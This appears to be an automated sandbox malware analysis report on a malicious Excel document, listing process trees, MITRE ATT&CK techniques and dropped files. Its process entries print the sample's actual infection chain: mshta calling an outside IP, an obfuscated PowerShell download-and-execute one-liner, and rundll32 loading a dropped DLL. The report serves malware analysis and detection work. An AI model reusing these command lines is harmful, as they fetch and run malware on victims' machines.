00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,22&2272,2226222222-22-22-2Rich,2PEL>a!P`@-R4PV0N@`@.text9EP `.rdata``@@.datae000@.rsrcPV``@@.relocb@B

Target ID:	0
Start time:	20:58:14
Start date:	28/01/2022
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f780000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exePID: 2968, Parent PID: 2092

General

Target ID:	2
Start time:	20:58:15
Start date:	28/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
Imagebase:	0x4a2c0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: mshta.exePID: 2804, Parent PID: 2968

General

Target ID:	4
Start time:	20:58:16
Start date:	28/01/2022
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta http://91.240.118.172/gg/ff/fe.html
Imagebase:	0x13f4e0000
File size:	13824 bytes
MD5 hash:	95828D670CFD3B16EE188168E083C3C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exePID: 800, Parent PID: 2804

General

Target ID:	6
Start time:	20:58:19
Start date:	28/01/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Imagebase:	0x13f6e0000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: cmd.exePID: 1256, Parent PID: 800

General

Target ID:	8
Start time:	20:58:50
Start date:	28/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Imagebase:	0xe90000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

⊘No disassembly

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report imedpub_8.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Dropped Files

Sigma Overview

System Summary

Jbx Signature Overview

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\JooSee.dll

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm

C:\Users\user\AppData\Local\Temp\32B4.tmp

C:\Users\user\AppData\Local\Temp\~DF3B12D0E9CF2F0062.TMP

C:\Users\user\AppData\Local\Temp\~DF9DFA6BFBFA953BEE.TMP

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X5Z6VJ3ODJ5VBJVEIRD5.temp

C:\Users\user\Desktop\imedpub_8.xls

Static File Info

General

File Icon

Static OLE Info

General

OLE File "imedpub_8.xls"

Indicators

Summary

Windows Analysis Report
imedpub_8.xls